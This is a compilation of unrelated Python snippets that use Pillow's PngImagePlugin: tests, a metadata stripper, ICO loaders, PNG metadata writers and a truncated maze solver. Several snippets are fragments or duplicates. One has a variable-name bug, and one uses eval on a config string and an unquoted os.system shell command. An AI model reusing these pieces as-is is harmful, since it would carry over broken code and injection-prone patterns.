def test_roundtrip_itxt(self): # Check iTXt roundtripping im = Image.new("RGB", (32, 32)) info = PngImagePlugin.PngInfo() info.add_itxt("spam", "Eggs", "en", "Spam") info.add_text("eggs", PngImagePlugin.iTXt("Spam", "en", "Eggs"), zip=True) im = roundtrip(im, pnginfo=info) self.assertEqual(im.info, {"spam": "Eggs", "eggs": "Spam"}) self.assertEqual(im.text, {"spam": "Eggs", "eggs": "Spam"}) self.assertEqual(im.text["spam"].lang, "en") self.assertEqual(im.text["spam"].tkey, "Spam") self.assertEqual(im.text["eggs"].lang, "en") self.assertEqual(im.text["eggs"].tkey, "Eggs")
def test_invalid_file(self): invalid_file = "Tests/images/flower.jpg" with pytest.raises(SyntaxError): PngImagePlugin.PngImageFile(invalid_file)
def test_invalid_file(self): invalid_file = "Tests/images/flower.jpg" self.assertRaises(SyntaxError, lambda: PngImagePlugin.PngImageFile(invalid_file))
def remove_image_metadata(filename: Path) -> None: """ Remove exif metadata from an image. INPUTS filename: A filename of an image OUTPUTS None. """ if filename.suffix == ".xcf" or filename.suffix == ".svg": # Skip GIMP XCF and SVG files return if filename.suffix == ".jpg": # JPEG images are lossy, and PIL will recompress them on save. # Instead of using PIL, read the byte stream and remove all metadata that way. # Inspired by https://github.com/hMatoba/Piexif with open(filename, "rb+") as file: jpeg_data = file.read() if jpeg_data[0:2] != b"\xff\xd8": raise se.InvalidFileException(f"Invalid JPEG file: [path][link=file://{filename.resolve()}]{filename}[/].") exif_segments = [] head = 2 # Get a list of metadata segments from the jpg while True: if jpeg_data[head: head + 2] == b"\xff\xda": break length = struct.unpack(">H", jpeg_data[head + 2: head + 4])[0] end_point = head + length + 2 seg = jpeg_data[head: end_point] head = end_point if head >= len(jpeg_data): raise se.InvalidFileException(f"Invalid JPEG file: [path][link=file://{filename.resolve()}]{filename}[/].") # See https://www.disktuna.com/list-of-jpeg-markers/ # and https://exiftool.org/TagNames/JPEG.html # These are the 15 "app" segments, EXCEPT app 14, as well as the "comment" segment. # This mirrors what exiftool does. metadata_segments = [b"\xff\xe1", b"\xff\xe2", b"\xff\xe3", b"\xff\xe4", b"\xff\xe5", b"\xff\xe6", b"\xff\xe7", b"\xff\xe8", b"\xff\xe9", b"\xff\xea", b"\xff\xeb", b"\xff\xec", b"\xff\xed", b"\xff\xef", b"\xff\xfe"] if seg[0:2] in metadata_segments: exif_segments.append(seg) # Now replace those segments with nothing for segment in exif_segments: jpeg_data = jpeg_data.replace(segment, b"") file.seek(0) file.write(jpeg_data) file.truncate() else: # PNG and other image types we expect are lossless so we can use PIL to remove metadata try: image = Image.open(filename) except UnidentifiedImageError as ex: raise se.InvalidFileException(f"Couldn’t identify image type of [path][link=file://{filename.resolve()}]{filename}[/].") from ex data = list(image.getdata()) image_without_exif = Image.new(image.mode, image.size) image_without_exif.putdata(data) if image.format == "PNG": # Some metadata, like chromaticity and gamma, are useful to preserve in PNGs new_exif = PngImagePlugin.PngInfo() for key, value in image.info.items(): if key.lower() == "gamma": new_exif.add(b"gAMA", struct.pack("!1I", int(value * 100000))) elif key.lower() == "chromaticity": new_exif.add(b"cHRM", struct.pack("!8I", \ int(value[0] * 100000), \ int(value[1] * 100000), \ int(value[2] * 100000), \ int(value[3] * 100000), \ int(value[4] * 100000), \ int(value[5] * 100000), \ int(value[6] * 100000), \ int(value[7] * 100000))) image_without_exif.save(filename, optimize=True, pnginfo=new_exif) elif image.format == "TIFF": # For some reason, when saving as TIFF we have to cast filename to str() otherwise # the save driver throws an exception image_without_exif.save(str(filename), compression="tiff_adobe_deflate") else: image_without_exif.save(str(filename))
def test_getchunks(self): im = hopper() chunks = PngImagePlugin.getchunks(im) self.assertEqual(len(chunks), 3)
def frame(self, idx): """ Get an image from frame idx """ header = self.entry[idx] self.buf.seek(header['offset']) data = self.buf.read(8) self.buf.seek(header['offset']) if data[:8] == PngImagePlugin._MAGIC: # png frame im = PngImagePlugin.PngImageFile(self.buf) else: # XOR + AND mask bmp frame im = BmpImagePlugin.DibImageFile(self.buf) # change tile dimension to only encompass XOR image im.size = (im.size[0], int(im.size[1] / 2)) d, e, o, a = im.tile[0] im.tile[0] = d, (0, 0) + im.size, o, a # figure out where AND mask image starts mode = a[0] bpp = 8 for k in BmpImagePlugin.BIT2MODE.keys(): if mode == BmpImagePlugin.BIT2MODE[k][1]: bpp = k break if 32 == bpp: # 32-bit color depth icon image allows semitransparent areas # PIL's DIB format ignores transparency bits, recover them. # The DIB is packed in BGRX byte order where X is the alpha # channel. # Back up to start of bmp data self.buf.seek(o) # extract every 4th byte (eg. 3,7,11,15,...) alpha_bytes = self.buf.read(im.size[0] * im.size[1] * 4)[3::4] # convert to an 8bpp grayscale image mask = Image.frombuffer( 'L', # 8bpp im.size, # (w, h) alpha_bytes, # source chars 'raw', # raw decoder ('L', 0, -1) # 8bpp inverted, unpadded, reversed ) else: # get AND image from end of bitmap w = im.size[0] if (w % 32) > 0: # bitmap row data is aligned to word boundaries w += 32 - (im.size[0] % 32) # the total mask data is # padded row size * height / bits per char and_mask_offset = o + int(im.size[0] * im.size[1] * (bpp / 8.0)) total_bytes = int((w * im.size[1]) / 8) self.buf.seek(and_mask_offset) maskData = self.buf.read(total_bytes) # convert raw data to image mask = Image.frombuffer( '1', # 1 bpp im.size, # (w, h) maskData, # source chars 'raw', # raw decoder ('1;I', int(w / 8), -1) # 1bpp inverted, padded, reversed ) # now we have two images, im is XOR image and mask is AND image # apply mask image as alpha channel im = im.convert('RGBA') im.putalpha(mask) return im
def create_images(): # actual image color: 255,0,0 img = Image.new("RGB", (100, 20), color='red') text = ImageDraw.Draw(img) text.text((10, 10), "Hello World", fill=(0, 0, 0)) image_wmeta = 'image_wmeta' # thumbnail color: 0,0,255 o = io.BytesIO() secret_thumbnail = Image.new("RGB", (120, 20), color='blue') text = ImageDraw.Draw(secret_thumbnail) text.text((10, 10), "secret thumbnail", fill=(0, 0, 0)) # transform it to bytes secret_thumbnail.save(o, "jpeg") secret_exif_thumbnail = o.getvalue() secret_thumbnail.close() # forbidden image_extension img.save(forbidden_img, "tiff") # bmp doesn't contain critical meta information img.save(image_wmeta + "_bmp" + '.bmp') # for some reasons some of these values don't match the relative specification: # rational numbers are separated at the comma, f.e. 13.37 is represented by [(13), (37)] # http://www.cipa.jp/std/documents/e/DC-008-2012_E.pdf#page=47 ... # http://www.cipa.jp/std/documents/e/DC-008-2012_E.pdf#page=87 jpg_exif = { "0th": { piexif.ImageIFD.ImageDescription: u"description", piexif.ImageIFD.StripOffsets: 3, piexif.ImageIFD.Artist: u"artist", piexif.ImageIFD.Copyright: u"copyright holder", piexif.ImageIFD.DateTime: u"2012:01:08 10:09:01", }, "Exif": { piexif.ExifIFD.DateTimeOriginal: u"2016:08:07 13:37:10", piexif.ExifIFD.DateTimeDigitized: u"2015:03:07 14:20:30", piexif.ExifIFD.OffsetTime: u"2017:05:09 08:04:04", piexif.ExifIFD.OffsetTimeOriginal: u"2017:04:12 18:15:00", piexif.ExifIFD.OffsetTimeDigitized: u"2016:02:10 11:10:03", piexif.ExifIFD.SubSecTime: u"2017:09:04 10:03:10", piexif.ExifIFD.SubSecTimeOriginal: u"2019:10:03 10:03:10", piexif.ExifIFD.SubSecTimeDigitized: u"2013:10:03 10:03:10", piexif.ExifIFD.CameraOwnerName: u"Cameraname", piexif.ExifIFD.BodySerialNumber: u"body serialnumber", piexif.ExifIFD.LensSerialNumber: u"lens serialnumber", piexif.ExifIFD.UserComment: b"secret comment", }, "GPS": { piexif.GPSIFD.GPSLatitudeRef: u"N", piexif.GPSIFD.GPSLatitude: [(10, 1), (20, 1), (0, 0)], piexif.GPSIFD.GPSLongitudeRef: u"W", piexif.GPSIFD.GPSLongitude: [(10, 1), (20, 1), (0, 0)], piexif.GPSIFD.GPSAltitudeRef: 0, piexif.GPSIFD.GPSAltitude: (200, 1), piexif.GPSIFD.GPSTimeStamp: [(10), (3)], piexif.GPSIFD.GPSSatellites: u"satellites", piexif.GPSIFD.GPSStatus: u"A", piexif.GPSIFD.GPSMeasureMode: u"3", piexif.GPSIFD.GPSDOP: [(1), (4)], piexif.GPSIFD.GPSSpeedRef: u"K", piexif.GPSIFD.GPSSpeed: [(42), (10)], piexif.GPSIFD.GPSTrackRef: u"T", piexif.GPSIFD.GPSTrack: [(21), (123)], piexif.GPSIFD.GPSImgDirectionRef: u"T", piexif.GPSIFD.GPSImgDirection: [(10), (12)], piexif.GPSIFD.GPSMapDatum: u"today", piexif.GPSIFD.GPSDestLatitudeRef: u"N", piexif.GPSIFD.GPSDestLatitude: [(8, 1), (30, 1), (0, 0)], piexif.GPSIFD.GPSDestLongitudeRef: u"E", piexif.GPSIFD.GPSDestLongitude: [(8), (30)], piexif.GPSIFD.GPSDestBearingRef: u"T", piexif.GPSIFD.GPSDestBearing: [(1), (10)], piexif.GPSIFD.GPSDestDistanceRef: u"K", piexif.GPSIFD.GPSDestDistance: [(10), (3)], piexif.GPSIFD.GPSProcessingMethod: b"WLAN", piexif.GPSIFD.GPSAreaInformation: b"area", piexif.GPSIFD.GPSDateStamp: u"2015:10:03 10:03:10", piexif.GPSIFD.GPSDifferential: 1, piexif.GPSIFD.GPSHPositioningError: [(2), (0)], }, "1st": { piexif.ImageIFD.ImageDescription: u"description", piexif.ImageIFD.StripOffsets: 3, piexif.ImageIFD.Artist: u"artist", piexif.ImageIFD.Copyright: u"copyright holder", piexif.ImageIFD.DateTime: u"2013:10:03 10:03:10", }, "thumbnail": secret_exif_thumbnail } png_dict = { "ImageDescription": u"description", "StripOffsets": "3", "Artist": u"artist", "Copyright": u"copyright holder", "DateTime": u"2012:01:08 10:09:01", "DateTimeOriginal": u"2016:08:07 13:37:10", "DateTimeDigitized": u"2015:03:07 14:20:30", "OffsetTime": u"2017:05:09 08:04:04", "OffsetTimeOriginal": u"2017:04:12 18:15:00", "OffsetTimeDigitized": u"2016:02:10 11:10:03", "SubSecTime": u"2017:09:04 10:03:10", "SubSecTimeOriginal": u"2019:10:03 10:03:10", "SubSecTimeDigitized": u"2013:10:03 10:03:10", "CameraOwnerName": u"Cameraname", "BodySerialNumber": u"body serialnumber", "LensSerialNumber": u"lens serialnumber", "UserComment": b"secret comment", "GPSLatitudeRef": u"N", "GPSLatitude": "3 deg 20' 0.00", "GPSLongitudeRef": u"W", "GPSLongitude": "3 deg 20.1' 0.00", "GPSAltitudeRef": "0", "GPSAltitude": "200 m Above Sea Level", "GPSTimeStamp": "03:19:59.999999", "GPSSatellites": u"satellites", "GPSStatus": u"A", "GPSMeasureMode": u"3", "GPSSpeedRef": u"K", "GPSSpeed": "4.2", "GPSTrackRef": u"T", "GPSTrack": "0.1707317073", "GPSImgDirectionRef": u"T", "GPSImgDirection": "0.6333333333", "GPSMapDatum": u"today", "GPSDestLatitudeRef": u"N", "GPSDestLatitude": "3 deg 30' 0.00", "GPSDestLongitudeRef": u"E", "GPSDestLongitude": "0 deg 16' 0.00", "GPSDestBearingRef": u"T", "GPSDestBearing": "0.1", "GPSDestDistanceRef": u"K", "GPSDestDistance": "3.333333333", "GPSProcessingMethod": b"WLAN", "GPSAreaInformation": b"area", "GPSDateStamp": u"2015:10:03 10:03:10", "GPSDifferential": "1", "ImageDescription": u"description", "StripOffsets": "3", "Artist": u"artist", "Copyright": u"copyright holder", "DateTime": u"2013:10:03 10:03:10", } # jpg with exif img.save(image_wmeta + '_jpg' + '.jpg', exif=piexif.dump(jpg_exif)) # copy jpg to jpe, jpeg copyfile(image_wmeta + '_jpg' + '.jpg', image_wmeta + '_jpe' + '.jpe') copyfile(image_wmeta + '_jpg' + '.jpg', image_wmeta + '_jpeg' + '.jpeg') # png exif-part png_info = PngImagePlugin.PngInfo() # copy png metadata for k, v in png_dict.items(): png_info.add_text(k, v, 0) img.save(image_wmeta + '_png' + '.png', "PNG", pnginfo=png_info) img.save(image_wmeta + '_gif' + '.gif') img.close() # xmp for gif and png xmp = XMPMeta() xmp.append_array_item(consts.XMP_NS_DC, 'secret', 'secret information', { 'prop_array_is_ordered': True, 'prop_value_is_array': True }) # gif xmp gif_image = XMPFiles(file_path=image_wmeta + '_gif' + ".gif", open_forupdate=True) gif_image.put_xmp(xmp) gif_image.close_file() # png part 2 png_image = XMPFiles(file_path=image_wmeta + '_png' + ".png", open_forupdate=True) png_image.put_xmp(xmp) png_image.close_file() return ((image_wmeta + '_' + suffix + "." + suffix) for suffix in ALLOWED_IMG_EXTENSIONS)
def addFlag(self, flag): meta = PngImagePlugin.PngInfo() meta.add_text("additionalInfo", flag) self.flag = meta
def load_icon(file, index=None): ''' Load Windows ICO image. See http://en.wikipedia.org/w/index.php?oldid=264332061 for file format description. ''' if isinstance(file, basestring): file = open(file, 'rb') header = struct.unpack('<3H', file.read(6)) # Check magic if header[:2] != (0, 1): raise SyntaxError('Not an ICO file') # Collect icon directories directories = [] for i in xrange(header[2]): directory = list(struct.unpack('<4B2H2I', file.read(16))) for j in xrange(3): if not directory[j]: directory[j] = 256 directories.append(directory) if index is None: # Select best icon directory = max(directories, key=operator.itemgetter(slice(0, 3))) else: directory = directories[index] # Seek to the bitmap data file.seek(directory[7]) prefix = file.read(16) file.seek(-16, 1) if PngImagePlugin._accept(prefix): # Windows Vista icon with PNG inside image = PngImagePlugin.PngImageFile(file) else: # Load XOR bitmap image = BmpImagePlugin.DibImageFile(file) if image.mode == 'RGBA': # Windows XP 32-bit color depth icon without AND bitmap pass else: # Patch up the bitmap height image.size = image.size[0], image.size[1] >> 1 d, e, o, a = image.tile[0] image.tile[0] = d, (0, 0) + image.size, o, a # Calculate AND bitmap dimensions. See # http://en.wikipedia.org/w/index.php?oldid=264236948#Pixel_storage # for description offset = o + a[1] * image.size[1] stride = ((image.size[0] + 31) >> 5) << 2 size = stride * image.size[1] # Load AND bitmap file.seek(offset) string = file.read(size) mask = Image.fromstring('1', image.size, string, 'raw', ('1;I', stride, -1)) image = image.convert('RGBA') image.putalpha(mask) return image
def writeMetadate(filename, data, key='gb_params'): im = Image.open(filename) meta = PngImagePlugin.PngInfo() json_data = json.dumps(data) meta.add_text(key, json_data) im.save(filname, "PNG", pnginfo=meta)
def get_disp_and_uncertainty( filenames, use_filtering, v_threshold, max_v_fail, fbc_threshold, min_fbc_pass, range_threshold, ): for i, filename in enumerate(filenames): print(f"{i + 1} / {len(filenames)}: {filename}") # read flow u_fw, v_fw = read_flow("flow_forward/" + filename + ".flo") u_bw, v_bw = read_flow("flow_backward/" + filename + ".flo") if use_filtering: check_v_fw = abs(v_fw) > v_threshold v_fail_fw = 1.0 * np.count_nonzero(check_v_fw) / v_fw.size if v_fail_fw >= max_v_fail: print("v_fail_fw too large") continue check_v_bw = abs(v_bw) > v_threshold v_fail_bw = 1.0 * np.count_nonzero(check_v_bw) / v_bw.size if v_fail_bw >= max_v_fail: print("v_fail_bw too large") continue range_fw = u_fw.max() - u_fw.min() if range_fw <= range_threshold: print("range_u_fw too small") continue range_bw = u_bw.max() - u_bw.min() if range_bw <= range_threshold: print("range_u_bw too small") continue # compute uncertainty and disparity ind_y, ind_x = np.indices(u_fw.shape, dtype=np.float32) y_map = ind_y x_map = ind_x + u_fw flow_flipped_and_warped = cv2.remap( -u_bw, x_map, y_map, interpolation=cv2.INTER_LINEAR, borderMode=cv2.BORDER_REPLICATE, ) uncertainty = abs(u_fw - flow_flipped_and_warped) if use_filtering: valid = uncertainty < fbc_threshold fbc_pass = 1.0 * np.count_nonzero(valid) / uncertainty.size if fbc_pass <= min_fbc_pass: print("fbc_pass too small") continue disp = -u_fw # downsample disparity and uncertainty downscaling = 0.5 disp = cv2.resize( disp, None, fx=downscaling, fy=downscaling, interpolation=cv2.INTER_LINEAR ) disp = disp * downscaling uncertainty = cv2.resize( uncertainty, None, fx=downscaling, fy=downscaling, interpolation=cv2.INTER_LINEAR, ) uncertainty = uncertainty * downscaling # quantize disparity and uncertainty disp_max = disp.max() disp_min = disp.min() if disp_max - disp_min > 0: disp = np.round((disp - disp_min) / (disp_max - disp_min) * 65535).astype( np.uint16 ) scale = 1.0 * (disp_max - disp_min) / 65535 offset = disp_min else: disp = (0 * disp).astype(np.uint16) offset = disp_min scale = 1.0 meta = PngImagePlugin.PngInfo() meta.add_text("offset", str(offset)) meta.add_text("scale", str(scale)) uncertainty = (10 * uncertainty).round() uncertainty[uncertainty > 255] = 255 # save disparity and uncertainty disp_name = "disparity/" + filename + ".png" if not os.path.exists(os.path.dirname(disp_name)): os.makedirs(os.path.dirname(disp_name)) imageio.imwrite(disp_name, disp, pnginfo=meta, prefer_uint8=False) uncertainty_name = "uncertainty/" + filename + ".png" if not os.path.exists(os.path.dirname(uncertainty_name)): os.makedirs(os.path.dirname(uncertainty_name)) imageio.imwrite(uncertainty_name, uncertainty.astype(np.uint8))
def picturesave(savename, directory='./', meta=None, extras=[], backup=False, dpi=300, form='png', version=False, pdf=False, tight=True, pad_inches=0, figure_held=None, loud=True, redacted=False): """ Function which saves the global matplotlib figure without overwriting. !Note that saving tuples get converted to lists in the metadata so if you notice that your plotter is not overwriting then this is probably why. """ #! amazing bug: if you keep a comma after meta it makes it a tuple and then there must be a #! one-way conversion to dict when it is written to the metadata of the image and this causes #! the figure counts to keep increasing no matter what. a very subtle error! corrected below if type(meta) == tuple: if len(meta) != 1 or type(meta[0]) != dict: raise Exception('meta must be a dict') else: meta = meta[0] #---automatically share images with group members (note that you could move this to config) os.umask(0o002) #---earlier import allows users to set Agg so we import here, later import matplotlib as mpl import matplotlib.pyplot as plt #---intervene here to check the wordspace for picture-saving "hooks" that apply to all new pictures #---! is it necessary to pass the workspace here? if 'work' in globals() and 'picture_hooks' in work.metadata.variables: extra_meta = work.metadata.variables['picture_hooks'] #---redundant keys are not allowed: either they are in picture_hooks or passed to picturesave redundant_extras = [i for i in extra_meta if i in meta] if any(redundant_extras): raise Exception( 'keys "%r" are incoming via meta but are already part of picture_hooks' % redundant_extras) #---redacted figures have blurred labels if redacted: directory_redacted = os.path.join(directory, 'REDACTED') if not os.path.isdir(directory_redacted): os.mkdir(directory_redacted) directory = directory_redacted status('you have requested redacted figures, so they are saved to %s' % directory, tag='warning') import random color_back = work.metadata.director.get('redacted_background_color', '') color_fore = work.metadata.director.get('redacted_foreground_color', 'k') if 'redacted_scrambler' in work.metadata.director: scrambler_code = work.metadata.director['redacted_scrambler'] try: scrambler = eval(scrambler_code) scrambler('test text') except: raise Exception( 'failed to evaluate your `redacted_scrambler` from the director: `%s`' % scrambler_code) else: #! method below is deprecated because it looks silly. best to use hashes if False: scrambler = lambda x, max_len=12: ''.join( [chr(ord('a') + random.randint(0, 25)) for i in x][:max_len]) scrambler = lambda x, max_len=10: ('#' * len(x))[:max_len] num_format = re.compile("^[\-]?[1-9][0-9]*\.?[0-9]+$") isnumber = lambda x: re.match(num_format, x) for obj in [i for i in plt.findobj() if type(i) == mpl.text.Text]: text_this = obj.get_text() if text_this != '' and not isnumber(text_this): obj.set_text(scrambler(text_this)) if color_back: obj.set_backgroundcolor(color_back) obj.set_color(color_fore) #---if version then we choose savename based on the next available index if version: #---check for this meta search = picturefind(savename, directory=directory, meta=meta, loud=loud) if not search: if meta == None: raise Exception('[ERROR] versioned image saving requires meta') fns = glob.glob(os.path.join(directory, savename + '.v*')) nums = [ int(re.findall('^.+\.v([0-9]+)\.png', fn)[0]) for fn in fns if re.match('^.+\.v[0-9]+\.png', fn) ] ind = max(nums) + 1 if nums != [] else 1 savename += '.v%d' % ind else: savename = re.findall('(.+)\.[a-z]+', os.path.basename(search))[0] #---backup if necessary savename += '.' + form base_fn = os.path.join(directory, savename) if loud: status('saving picture to %s' % savename, tag='store') if os.path.isfile(base_fn) and backup: for i in range(1, 100): latestfile = '.'.join(base_fn.split('.')[:-1]) + '.bak' + ( '%02d' % i) + '.' + base_fn.split('.')[-1] if not os.path.isfile(latestfile): break if i == 99 and os.path.isfile(latestfile): raise Exception('except: too many copies') else: if loud: status('backing up ' + base_fn + ' to ' + latestfile, tag='store') os.rename(base_fn, latestfile) #---intervene to use the PDF backend if desired #---...this is particularly useful for the hatch-width hack #---...(search self.output(0.1, Op.setlinewidth) in #---...python2.7/site-packages/matplotlib/backends/backend_pdf.py and raise it to e.g. 3.0) if pdf and form != 'png': raise Exception('can only use PDF conversion when writing png') elif pdf: alt_name = re.sub('.png$', '.pdf', savename) #---holding the figure allows other programs e.g. ipython notebooks to show and save the figure (figure_held if figure_held else plt).savefig( alt_name, dpi=dpi, bbox_extra_artists=extras, bbox_inches='tight' if tight else None, pad_inches=pad_inches if pad_inches else None, format=form) #---convert pdf to png os.system('convert -density %d %s %s' % (dpi, alt_name, base_fn)) os.remove(alt_name) else: (figure_held if figure_held else plt).savefig( base_fn, dpi=dpi, bbox_extra_artists=extras, bbox_inches='tight' if tight else None, pad_inches=pad_inches if pad_inches else None, format=form) plt.close() #---add metadata to png if form == 'png' and meta != None: im = Image.open(base_fn) imgmeta = PngImagePlugin.PngInfo() imgmeta.add_text('meta', json.dumps(meta)) im.save(base_fn, form, pnginfo=imgmeta) else: print( '[WARNING] you are saving as %s and only png allows metadata-versioned pictures' % form) return base_fn
directories.append(directory) if index is None: # Select best icon directory = max(directories, key=operator.itemgetter(slice(0, 3))) else: directory = directories[index] # Seek to the bitmap data image_file.seek(directory[7]) prefix = image_file.read(16) image_file.seek(-16, 1) if PngImagePlugin._accept(prefix): # Windows Vista icon with PNG inside try: image = PngImagePlugin.PngImageFile(image_file) except IOError: return else: # Load XOR bitmap try: image = BmpImagePlugin.DibImageFile(image_file) except IOError: return if image.mode == 'RGBA': # Windows XP 32-bit color depth icon without AND bitmap pass else:
def save_figure(self, filepath, filename, plotfig=None, timestamp=None): # -------------------------------------------------------------------------------------------- # Save thumbnail figure of plot if plotfig is not None: # create Metadata metadata = dict() metadata[ 'Title'] = 'Image produced by qudi-hira: ' + self.module_name metadata['Author'] = 'qudi-hira - Software Suite' metadata[ 'Subject'] = 'Find more information on: https://github.com/projecthira/qudi-hira' metadata[ 'Keywords'] = 'Python 3, Qt, experiment control, automation, measurement, software, framework, modular' metadata['Producer'] = 'qudi - Software Suite' if timestamp is not None: metadata['CreationDate'] = timestamp metadata['ModDate'] = timestamp else: metadata['CreationDate'] = time metadata['ModDate'] = time if self.save_pdf: # determine the PDF-Filename fig_fname_vector = os.path.join(filepath, filename)[:-4] + '_fig.pdf' # Create the PdfPages object to which we will save the pages: # The with statement makes sure that the PdfPages object is closed properly at # the end of the block, even if an Exception occurs. with PdfPages(fig_fname_vector) as pdf: pdf.savefig(plotfig, bbox_inches='tight', pad_inches=0.05) # We can also set the file's metadata via the PdfPages object: pdf_metadata = pdf.infodict() for x in metadata: pdf_metadata[x] = metadata[x] self.log.info(f'Image saved to: \n{fig_fname_vector}') if self.save_png: # determine the PNG-Filename and save the plain PNG fig_fname_image = os.path.join(filepath, filename)[:-4] + '_fig.png' plotfig.savefig(fig_fname_image, bbox_inches='tight', pad_inches=0.05) # Use Pillow (an fork for PIL) to attach metadata to the PNG png_image = Image.open(fig_fname_image) png_metadata = PngImagePlugin.PngInfo() # PIL can only handle Strings, so let's convert our times metadata['CreationDate'] = metadata['CreationDate'].strftime( '%Y%m%d-%H%M-%S') metadata['ModDate'] = metadata['ModDate'].strftime( '%Y%m%d-%H%M-%S') for x in metadata: # make sure every value of the metadata is a string if not isinstance(metadata[x], str): metadata[x] = str(metadata[x]) # add the metadata to the picture png_metadata.add_text(x, metadata[x]) # save the picture again, this time including the metadata png_image.save(fig_fname_image, "png", pnginfo=png_metadata) self.log.info(f'Image saved to: \n{fig_fname_image}') # close matplotlib figure plt.close(plotfig)
def chunk(cid, *data): test_file = BytesIO() PngImagePlugin.putchunk(*(test_file, cid) + data) return test_file.getvalue()
def chunk(cid, *data): file = BytesIO() PngImagePlugin.putchunk(*(file, cid) + data) return file.getvalue()
def graph(self, info: str = None, output=("plt", "excel")) -> str: """ Graph the recorded statistics in a plt plot, in an excel spreadsheet or in an ssps compatible file. Args: output (Tuple[str]): the output formats to use. info(str): Additional notes for the plt plot. If None is passed the function will ask via input so if you don't want info, pass an empty string. Returns: str: folder name for output """ compatible_out = ["plt", "excel", "spss"] e = False for ro in output: if ro not in compatible_out: e = True print( "WARNING, output format {} is not supported, it will be skipped" .format(ro)) if e: print("We currently support " + str(compatible_out)) if info is None: info = input("Enter additional information about the sim: ") titles = [ "Number Of Agents", "Average Agent Mass", "Amount of Food Consumed", "Average Agent IQ", "Average Agent EQ", "Average breeding mass divider", "Average Agent Breed Chance", "Fight count relative to population size", "Help count relative to population size", "Ignore count relative to population size", "Number of groups", "Close family ration in group" ] values = [ self.number_of_agents_OT, self.mass_OT, self.eat_OT, self.iq_OT, self.iq_OT, self.breed_mass_div_OT, self.breed_chance_OT, self.fight_OT, self.help_OT, self.nothing_OT, self.relative_groups_OT, self.close_family_in_group_OT ] extention = "png" fn = "graphs-0.3/" + self.get_fn() os.mkdir(fn) try: if "plt" in output: if len(titles) != len(values): raise Exception( "Error len of titles must match len of vars") fig, axs = plt.subplots(len(values), sharex='all', figsize=(20, 60)) metadata = dict() for i in range(len(values)): axs[i].plot(self.i_OT, values[i], linewidth=0.25) axs[i].axes.set_ylim([0, max(values[i])]) axs[i].set_ylabel(titles[i]) metadata["Final" + titles[i]] = values[i][-1] axs[0].axes.set_xlim([0, self.dataPoints]) axs[0].set_title( "Simulation with {} initial agents and {} steps\nDate: {}\nNotes: {}\n\nStats:\n{}\n" .format(len(self.agents), self.gcsteps, time.strftime("%D"), info, self.stats()), ) axs[-1].set_xlabel("Number Of Data Points") plt.tight_layout() plt.autoscale() pltfn = fn + "/plt." + extention fig.savefig(pltfn, bbox_inches='tight') # save graph # add metadata: im = Image.open(pltfn) meta = PngImagePlugin.PngInfo() for x in metadata: meta.add_text(x, str(metadata[x])) im.save(pltfn, extention, pnginfo=meta) except: print("error in generating plt file") transposed_data = [] for i in range(self.dataPoints): transposed_data.append([j[i] for j in values]) try: if "excel" in output: if len(values[0]) > 1048576: print("to manny data points, skipping excel") else: wb = openpyxl.Workbook(write_only=True) sheet = wb.create_sheet() sheet.append(titles) for i in transposed_data: sheet.append(i) wb.save(fn + "/excel.xlsx") except: print("error in generating excel file") if "spss" in output: savFileName = fn + '/spss.sav' varNames = [i.replace(" ", "_") for i in titles] varTypes = dict() for t in varNames: varTypes[t] = 0 with savReaderWriter.SavWriter(savFileName, varNames, varTypes) as writer: for i in range(self.dataPoints): writer.writerow(transposed_data[i]) return os.getcwd() + "\\" + fn.replace("/", "\\")
def level_24(): class Node: def __init__(self,parent,x,y,h): self.parent=parent self.x,self.y=x,y self.hv = (x << 16) ^ y self.g,self.h=0,h def __repr__(self): return '(%d,%d)'%(self.x,self.y) def __eq__(self,other): return self.hv == other def __hash__(self): return self.hv class AStarTest: def __init__(self,map_max_x,map_max_y,map): self.openlist,self.closedlist=[],set() self.mapMaxX,self.mapMaxY=map_max_x,map_max_y print ('%d %d'%(self.mapMaxX,self.mapMaxY)) self.map=map def inCloseList(self,x,y): """检查(x,y)是否在closedlist中""" return (x << 16) ^ y in self.closedlist def inOpenList(self,x,y): """检查(x,y)是否在openlist中""" for i,n in enumerate(self.openlist): if n.x==x and n.y==y: return i return -1 def showPath(self,l,showmark): """显示路径""" tm=[] # 用来保存从起点到终点的路径坐标列表 for i in l: tm.append((i.x,i.y)) if showmark: # 在新图中显示出路径来 f=PngImagePlugin.PngImageFile(r'maze.png') my=f.copy() draw=ImageDraw.Draw(my) draw.point(tm,showmark)# (0,0,255,255)) my.save(r'maze_showpath.png','png') # 将路径间隔着取像素的r值保存到zip文件中 f=PngImagePlugin.PngImageFile(r'maze.png') fo=open(r'maze_1.zip','wb') data=[] for i in tm[1::2]: # 从第二个像素开始间隔着取 r,dummy,dummy,dummy=f.getpixel(i) data.append(r) import array data = array.array("B", data).tostring() fo.write(data) fo.close() def SubNode(self,node,to_x,to_y): """ 返回节点node的有效子节点""" subList=[(node.x,node.y-1),\ (node.x-1,node.y),\ (node.x+1,node.y),\ (node.x,node.y+1),] for x,y in subList: if self.map[y][x] !='#': # 坐标值有效 if not self.inCloseList(x,y): # 不在closedlist中 item= Node(node,x,y,math.sqrt((x-to_x)*(x-to_x)+(y-to_y)*(y-to_y))*1.2) item.g=item.parent.g+1.0 yield item def getPath(self,from_x,from_y,to_x,to_y,show_mark=None): """获取两点间的路径 from_coord 起点 to_coord 终点 show_mark 用来显示路径的颜色 """ print ("(%d,%d)->(%d,%d)"%(from_x,from_y,to_x,to_y)) self.openlist.append(Node(None,from_x,from_y,0)) while self.openlist: # 重复如下的工作: # a) 寻找开启列表中F值最低的格子。我们称它为当前格。 minf,minidx,curCoord=1000000,-1,None # 假设当前最新f为1000000 for i,n in enumerate(self.openlist): if n.g+n.h<minf: minf=n.g+n.h curCoord=n minidx=i # b) 把它切换到关闭列表。 del self.openlist[minidx] self.closedlist.add(curCoord) # c) 对相邻的8格中的每一个 for item in self.SubNode(curCoord,to_x,to_y): # 如果它不在开启列表中,把它添加进去。把当前格作为这一格的父节点。 # 记录这一格的F,G,和H值。 i=self.inOpenList(item.x,item.y) if i==-1: self.openlist.append(item) # 保存路径。从目标格开始,沿着每一格的父节点移动直到回到起始格。这就是你的路径。 if item.x==to_x and item.y==to_y: print ("found %d,len(closedlist)=%d"%(item.g,len(self.closedlist))) l=[item] p=item.parent while p: l.append(p) p=p.parent l.reverse() self.showPath(l,show_mark) return True # 如果它已经在开启列表中,用G值为参考检查新的路径是否更好。更低的G值 # 意味着更好的路径。如果是这样,就把这一格的父节点改成当前格,并且 # 重新计算这一格的G和F值。如果你保持你的开启列表按F值排序,改变之后 # 你可能需要重新对开启列表排序。 else: if item.g<self.openlist[i].g: self.openlist[i].parent=curCoord 